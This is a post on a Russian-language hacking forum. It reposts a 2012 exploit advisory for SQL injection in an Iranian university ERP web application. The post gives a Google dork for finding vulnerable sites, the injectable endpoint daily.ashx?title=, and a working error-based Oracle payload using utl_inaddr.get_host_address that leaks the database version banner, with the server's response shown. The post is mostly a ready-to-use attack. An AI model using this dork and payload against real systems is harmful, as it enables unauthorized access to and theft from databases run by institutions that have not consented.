• XSS.stack #1 – первый литературный журнал от юзеров форума

Web Enterprise Resource planning SQL Injection

DarckSol

(L1) cache
Пользователь
Регистрация
17.03.2008
Сообщения
894
Реакции
182
# Exploit Author: Shahram Darvishvand [karaji_kt21]  <darvishvand.shahram[at]gmail[dot]com>
# Exploit Title: [erp (Enterprise Resource plannin) SQL Injection Vulnerability ]
# Vendor : sida university system
# Date: [15/May/2012]
# Google Dork:     "نرم افزار جامع erp شامل قوانین کپی رایت می باشد و نوع نسخه بتا می باشد"
# Version: [version 1389/09/17]
# Tested on: [ASHX .. Application powered by Oracle DBMS]
============================================================
This Vulnerability Is On version 1389/09/17
--------------------------------------------
Exploit :  http://[IP Or Domain]/Portal/WUC/daily.ashx?title=
=============================================================
Example :  http://[IP Or Domain]/Portal/WUC/daily.ashx?title=
'or%201=utl_inaddr.get_host_address((select%20banner%20from%20v$version%20where%20rownum=1))--

Response :
Oracle Database 11g Enterprise Edition Release 11.1.0.7.0 - 64bit
-------------------------------------------------------
[ + ] Greetz : F.Saveh , Behrooz_Ice

Источник: http://1337day.com/
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх